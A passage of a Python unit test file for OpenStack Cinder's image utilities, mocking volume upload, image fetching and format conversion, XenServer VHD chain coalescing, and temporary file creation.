@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.fileutils.file_open')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.os')
def test_same_format(self, mock_os, mock_temp, mock_convert, mock_info,
mock_open, mock_conf, mock_chown):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_meta = {'id': 'test_id',
'disk_format': 'raw'}
volume_path = mock.sentinel.volume_path
mock_os.name = 'posix'
mock_os.access.return_value = False
output = image_utils.upload_volume(ctxt, image_service, image_meta,
volume_path)
self.assertIsNone(output)
self.assertFalse(mock_convert.called)
self.assertFalse(mock_info.called)
mock_chown.assert_called_once_with(volume_path)
mock_open.assert_called_once_with(volume_path)
image_service.update.assert_called_once_with(
ctxt, image_meta['id'], {},
mock_open.return_value.__enter__.return_value)
@mock.patch('cinder.image.image_utils.utils.temporary_chown')
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.fileutils.file_open')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.os')
def test_same_format_on_nt(self, mock_os, mock_temp, mock_convert,
mock_info, mock_open, mock_conf, mock_chown):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_meta = {'id': 'test_id',
'disk_format': 'raw'}
volume_path = mock.sentinel.volume_path
mock_os.name = 'nt'
mock_os.access.return_value = False
output = image_utils.upload_volume(ctxt, image_service, image_meta,
volume_path)
self.assertIsNone(output)
self.assertFalse(mock_convert.called)
self.assertFalse(mock_info.called)
mock_open.assert_called_once_with(volume_path, 'rb')
image_service.update.assert_called_once_with(
ctxt, image_meta['id'], {},
mock_open.return_value.__enter__.return_value)
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.fileutils.file_open')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.os')
def test_convert_error(self, mock_os, mock_temp, mock_convert, mock_info,
mock_open, mock_conf):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_meta = {'id': 'test_id',
'disk_format': mock.sentinel.disk_format}
volume_path = mock.sentinel.volume_path
mock_os.name = 'posix'
data = mock_info.return_value
data.file_format = mock.sentinel.other_disk_format
data.backing_file = None
temp_file = mock_temp.return_value.__enter__.return_value
self.assertRaises(exception.ImageUnacceptable,
image_utils.upload_volume,
ctxt, image_service, image_meta, volume_path)
mock_convert.assert_called_once_with(volume_path,
temp_file,
mock.sentinel.disk_format,
run_as_root=True)
mock_info.assert_called_with(temp_file, run_as_root=True)
self.assertEqual(2, mock_info.call_count)
self.assertFalse(image_service.update.called)
class TestFetchToVhd(test.TestCase):
@mock.patch('cinder.image.image_utils.fetch_to_volume_format')
def test_defaults(self, mock_fetch_to):
ctxt = mock.sentinel.context
image_service = mock.sentinel.image_service
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
blocksize = mock.sentinel.blocksize
output = image_utils.fetch_to_vhd(ctxt, image_service, image_id,
dest, blocksize)
self.assertIsNone(output)
mock_fetch_to.assert_called_once_with(ctxt, image_service, image_id,
dest, 'vpc', blocksize, None,
None, run_as_root=True)
@mock.patch('cinder.image.image_utils.fetch_to_volume_format')
def test_kwargs(self, mock_fetch_to):
ctxt = mock.sentinel.context
image_service = mock.sentinel.image_service
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
run_as_root = mock.sentinel.run_as_root
output = image_utils.fetch_to_vhd(ctxt, image_service, image_id,
dest, blocksize, user_id=user_id,
project_id=project_id,
run_as_root=run_as_root)
self.assertIsNone(output)
mock_fetch_to.assert_called_once_with(ctxt, image_service, image_id,
dest, 'vpc', blocksize, user_id,
project_id,
run_as_root=run_as_root)
class TestFetchToRaw(test.TestCase):
@mock.patch('cinder.image.image_utils.fetch_to_volume_format')
def test_defaults(self, mock_fetch_to):
ctxt = mock.sentinel.context
image_service = mock.sentinel.image_service
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
blocksize = mock.sentinel.blocksize
output = image_utils.fetch_to_raw(ctxt, image_service, image_id,
dest, blocksize)
self.assertIsNone(output)
mock_fetch_to.assert_called_once_with(ctxt, image_service, image_id,
dest, 'raw', blocksize, None,
None, None, run_as_root=True)
@mock.patch('cinder.image.image_utils.fetch_to_volume_format')
def test_kwargs(self, mock_fetch_to):
ctxt = mock.sentinel.context
image_service = mock.sentinel.image_service
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = mock.sentinel.size
run_as_root = mock.sentinel.run_as_root
output = image_utils.fetch_to_raw(ctxt, image_service, image_id,
dest, blocksize, user_id=user_id,
project_id=project_id, size=size,
run_as_root=run_as_root)
self.assertIsNone(output)
mock_fetch_to.assert_called_once_with(ctxt, image_service, image_id,
dest, 'raw', blocksize, user_id,
project_id, size,
run_as_root=run_as_root)
class TestFetchToVolumeFormat(test.TestCase):
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_defaults(self, mock_conf, mock_temp, mock_info, mock_fetch,
mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
data = mock_info.return_value
data.file_format = volume_format
data.backing_file = None
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
output = image_utils.fetch_to_volume_format(ctxt, image_service,
image_id, dest,
volume_format, blocksize)
self.assertIsNone(output)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=True),
mock.call(tmp, run_as_root=True),
mock.call(dest, run_as_root=True)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, None, None)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
mock_convert.assert_called_once_with(tmp, dest, volume_format,
run_as_root=True)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_kwargs(self, mock_conf, mock_temp, mock_info, mock_fetch,
mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = volume_format
data.backing_file = None
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
output = image_utils.fetch_to_volume_format(
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
self.assertIsNone(output)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root),
mock.call(dest, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
mock_convert.assert_called_once_with(tmp, dest, volume_format,
run_as_root=run_as_root)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info',
side_effect=processutils.ProcessExecutionError)
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_no_qemu_img_and_is_raw(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
tmp = mock_temp.return_value.__enter__.return_value
image_service.show.return_value = {'disk_format': 'raw',
'size': 41126400}
image_size_m = math.ceil(41126400 / units.Mi)
output = image_utils.fetch_to_volume_format(
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
self.assertIsNone(output)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
mock_copy.assert_called_once_with(tmp, dest, image_size_m,
blocksize)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info',
side_effect=processutils.ProcessExecutionError)
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_no_qemu_img_not_raw(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
tmp = mock_temp.return_value.__enter__.return_value
image_service.show.return_value = {'disk_format': 'not_raw'}
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
self.assertFalse(mock_fetch.called)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info',
side_effect=processutils.ProcessExecutionError)
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_no_qemu_img_no_metadata(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
tmp = mock_temp.return_value.__enter__.return_value
image_service.show.return_value = None
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
self.assertFalse(mock_fetch.called)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_size_error(self, mock_conf, mock_temp, mock_info, mock_fetch,
mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 1234
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = volume_format
data.backing_file = None
data.virtual_size = 4321 * 1024 ** 3
tmp = mock_temp.return_value.__enter__.return_value
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_qemu_img_parse_error(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = None
data.backing_file = None
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_backing_file_error(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = volume_format
data.backing_file = mock.sentinel.backing_file
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
self.assertFalse(mock_convert.called)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=False)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def _test_format_name_mismatch(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert,
legacy_format_name=False):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = 'vhd'
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = 'vpc' if legacy_format_name else 'raw'
data.backing_file = None
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
if legacy_format_name:
image_utils.fetch_to_volume_format(
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
else:
self.assertRaises(
exception.ImageUnacceptable,
image_utils.fetch_to_volume_format,
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root),
mock.call(dest, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
self.assertFalse(mock_repl_xen.called)
self.assertFalse(mock_copy.called)
mock_convert.assert_called_once_with(tmp, dest, volume_format,
run_as_root=run_as_root)
def test_format_mismatch(self):
self._test_format_name_mismatch()
def test_format_name_mismatch_same_format(self):
# Make sure no exception is raised because of qemu-img still using
# the legacy 'vpc' format name if 'vhd' is requested.
self._test_format_name_mismatch(legacy_format_name=True)
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
@mock.patch(
'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
@mock.patch('cinder.image.image_utils.is_xenserver_image',
return_value=True)
@mock.patch('cinder.image.image_utils.fetch')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.CONF')
def test_xenserver_to_vhd(self, mock_conf, mock_temp, mock_info,
mock_fetch, mock_is_xen, mock_repl_xen,
mock_copy, mock_convert):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
volume_format = mock.sentinel.volume_format
blocksize = mock.sentinel.blocksize
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 4321
run_as_root = mock.sentinel.run_as_root
data = mock_info.return_value
data.file_format = volume_format
data.backing_file = None
data.virtual_size = 1234
tmp = mock_temp.return_value.__enter__.return_value
output = image_utils.fetch_to_volume_format(
ctxt, image_service, image_id, dest, volume_format, blocksize,
user_id=user_id, project_id=project_id, size=size,
run_as_root=run_as_root)
self.assertIsNone(output)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_temp.assert_called_once_with()
mock_info.assert_has_calls([
mock.call(tmp, run_as_root=run_as_root),
mock.call(tmp, run_as_root=run_as_root),
mock.call(dest, run_as_root=run_as_root)])
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
tmp, user_id, project_id)
mock_repl_xen.assert_called_once_with(tmp)
self.assertFalse(mock_copy.called)
mock_convert.assert_called_once_with(tmp, dest, volume_format,
run_as_root=run_as_root)
class TestXenserverUtils(test.TestCase):
@mock.patch('cinder.image.image_utils.is_xenserver_format')
def test_is_xenserver_image(self, mock_format):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
output = image_utils.is_xenserver_image(ctxt, image_service, image_id)
image_service.show.assert_called_once_with(ctxt, image_id)
mock_format.assert_called_once_with(image_service.show.return_value)
self.assertEqual(mock_format.return_value, output)
def test_is_xenserver_format(self):
image_meta1 = {'disk_format': 'vhd', 'container_format': 'ovf'}
self.assertTrue(image_utils.is_xenserver_format(image_meta1))
image_meta2 = {'disk_format': 'test_disk_format',
'container_format': 'test_cont_format'}
self.assertFalse(image_utils.is_xenserver_format(image_meta2))
@mock.patch('cinder.image.image_utils.utils.execute')
def test_extract_targz(self, mock_exec):
name = mock.sentinel.archive_name
target = mock.sentinel.target
output = image_utils.extract_targz(name, target)
mock_exec.assert_called_once_with('tar', '-xzf', name, '-C', target)
self.assertIsNone(output)
class TestVhdUtils(test.TestCase):
@mock.patch('cinder.image.image_utils.utils.execute')
def test_set_vhd_parent(self, mock_exec):
vhd_path = mock.sentinel.vhd_path
parentpath = mock.sentinel.parentpath
output = image_utils.set_vhd_parent(vhd_path, parentpath)
mock_exec.assert_called_once_with('vhd-util', 'modify', '-n', vhd_path,
'-p', parentpath)
self.assertIsNone(output)
@mock.patch('cinder.image.image_utils.set_vhd_parent')
def test_fix_vhd_chain(self, mock_set_parent):
vhd_chain = (mock.sentinel.first,
mock.sentinel.second,
mock.sentinel.third,
mock.sentinel.fourth,
mock.sentinel.fifth)
output = image_utils.fix_vhd_chain(vhd_chain)
self.assertIsNone(output)
mock_set_parent.assert_has_calls([
mock.call(mock.sentinel.first, mock.sentinel.second),
mock.call(mock.sentinel.second, mock.sentinel.third),
mock.call(mock.sentinel.third, mock.sentinel.fourth),
mock.call(mock.sentinel.fourth, mock.sentinel.fifth)])
@mock.patch('cinder.image.image_utils.utils.execute',
return_value=(98765.43210, mock.sentinel.error))
def test_get_vhd_size(self, mock_exec):
vhd_path = mock.sentinel.vhd_path
output = image_utils.get_vhd_size(vhd_path)
mock_exec.assert_called_once_with('vhd-util', 'query', '-n', vhd_path,
'-v')
self.assertEqual(98765, output)
@mock.patch('cinder.image.image_utils.utils.execute')
def test_resize_vhd(self, mock_exec):
vhd_path = mock.sentinel.vhd_path
size = 387549349
journal = mock.sentinel.journal
output = image_utils.resize_vhd(vhd_path, size, journal)
self.assertIsNone(output)
mock_exec.assert_called_once_with('vhd-util', 'resize', '-n', vhd_path,
'-s', str(size), '-j', journal)
@mock.patch('cinder.image.image_utils.utils.execute')
def test_coalesce_vhd(self, mock_exec):
vhd_path = mock.sentinel.vhd_path
output = image_utils.coalesce_vhd(vhd_path)
self.assertIsNone(output)
mock_exec.assert_called_once_with('vhd-util', 'coalesce', '-n',
vhd_path)
@mock.patch('cinder.image.image_utils.coalesce_vhd')
@mock.patch('cinder.image.image_utils.resize_vhd')
@mock.patch('cinder.image.image_utils.get_vhd_size')
@mock.patch('cinder.image.image_utils.utils.execute')
def test_coalesce_chain(self, mock_exec, mock_size, mock_resize,
mock_coal):
vhd_chain = (mock.sentinel.first,
mock.sentinel.second,
mock.sentinel.third,
mock.sentinel.fourth,
mock.sentinel.fifth)
output = image_utils.coalesce_chain(vhd_chain)
self.assertEqual(mock.sentinel.fifth, output)
mock_size.assert_has_calls([
mock.call(mock.sentinel.first),
mock.call(mock.sentinel.second),
mock.call(mock.sentinel.third),
mock.call(mock.sentinel.fourth)])
mock_resize.assert_has_calls([
mock.call(mock.sentinel.second, mock_size.return_value, mock.ANY),
mock.call(mock.sentinel.third, mock_size.return_value, mock.ANY),
mock.call(mock.sentinel.fourth, mock_size.return_value, mock.ANY),
mock.call(mock.sentinel.fifth, mock_size.return_value, mock.ANY)])
mock_coal.assert_has_calls([
mock.call(mock.sentinel.first),
mock.call(mock.sentinel.second),
mock.call(mock.sentinel.third),
mock.call(mock.sentinel.fourth)])
@mock.patch('cinder.image.image_utils.os.path')
def test_discover_vhd_chain(self, mock_path):
directory = '/some/test/directory'
mock_path.join.side_effect = lambda x, y: '/'.join((x, y))
mock_path.exists.side_effect = (True, True, True, False)
output = image_utils.discover_vhd_chain(directory)
expected_output = ['/some/test/directory/0.vhd',
'/some/test/directory/1.vhd',
'/some/test/directory/2.vhd']
self.assertEqual(expected_output, output)
@mock.patch('cinder.image.image_utils.temporary_dir')
@mock.patch('cinder.image.image_utils.os.rename')
@mock.patch('cinder.image.image_utils.fileutils.delete_if_exists')
@mock.patch('cinder.image.image_utils.coalesce_chain')
@mock.patch('cinder.image.image_utils.fix_vhd_chain')
@mock.patch('cinder.image.image_utils.discover_vhd_chain')
@mock.patch('cinder.image.image_utils.extract_targz')
def test_replace_xenserver_image_with_coalesced_vhd(
self, mock_targz, mock_discover, mock_fix, mock_coal, mock_delete,
mock_rename, mock_temp):
image_file = mock.sentinel.image_file
tmp = mock_temp.return_value.__enter__.return_value
output = image_utils.replace_xenserver_image_with_coalesced_vhd(
image_file)
self.assertIsNone(output)
mock_targz.assert_called_once_with(image_file, tmp)
mock_discover.assert_called_once_with(tmp)
mock_fix.assert_called_once_with(mock_discover.return_value)
mock_coal.assert_called_once_with(mock_discover.return_value)
mock_delete.assert_called_once_with(image_file)
mock_rename.assert_called_once_with(mock_coal.return_value, image_file)
class TestCreateTemporaryFile(test.TestCase):
@mock.patch('cinder.image.image_utils.os.close')
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.os.path.exists')
@mock.patch('cinder.image.image_utils.os.makedirs')
@mock.patch('cinder.image.image_utils.tempfile.mkstemp')
def test_create_temporary_file_no_dir(self, mock_mkstemp, mock_dirs,
mock_path, mock_conf, mock_close):
mock_conf.image_conversion_dir = None
fd = mock.sentinel.file_descriptor
path = mock.sentinel.absolute_pathname
mock_mkstemp.return_value = (fd, path)
output = image_utils.create_temporary_file()
self.assertEqual(path, output)
mock_mkstemp.assert_called_once_with(dir=None)
mock_close.assert_called_once_with(fd)
@mock.patch('cinder.image.image_utils.os.close')
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.os.path.exists', return_value=True)
@mock.patch('cinder.image.image_utils.os.makedirs')
@mock.patch('cinder.image.image_utils.tempfile.mkstemp')
def test_create_temporary_file_with_dir(self, mock_mkstemp, mock_dirs,
mock_path, mock_conf, mock_close):
conv_dir = mock.sentinel.image_conversion_dir
mock_conf.image_conversion_dir = conv_dir
fd = mock.sentinel.file_descriptor
path = mock.sentinel.absolute_pathname
mock_mkstemp.return_value = (fd, path)
output = image_utils.create_temporary_file()
self.assertEqual(path, output)
self.assertFalse(mock_dirs.called)
mock_mkstemp.assert_called_once_with(dir=conv_dir)
mock_close.assert_called_once_with(fd)
@mock.patch('cinder.image.image_utils.os.close')
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.os.path.exists', return_value=False)
@mock.patch('cinder.image.image_utils.os.makedirs')
@mock.patch('cinder.image.image_utils.tempfile.mkstemp')
def test_create_temporary_file_and_dir(self, mock_mkstemp, mock_dirs,
mock_path, mock_conf, mock_close):
conv_dir = mock.sentinel.image_conversion_dir
mock_conf.image_conversion_dir = conv_dir
fd = mock.sentinel.file_descriptor
path = mock.sentinel.absolute_pathname
mock_mkstemp.return_value = (fd, path)
output = image_utils.create_temporary_file()
self.assertEqual(path, output)
mock_dirs.assert_called_once_with(conv_dir)
mock_mkstemp.assert_called_once_with(dir=conv_dir)
mock_close.assert_called_once_with(fd)
class TestTemporaryFileContextManager(test.TestCase):
@mock.patch('cinder.image.image_utils.create_temporary_file',
return_value=mock.sentinel.temporary_file)
@mock.patch('cinder.image.image_utils.fileutils.delete_if_exists')
def test_temporary_file(self, mock_delete, mock_create):
with image_utils.temporary_file() as tmp_file:
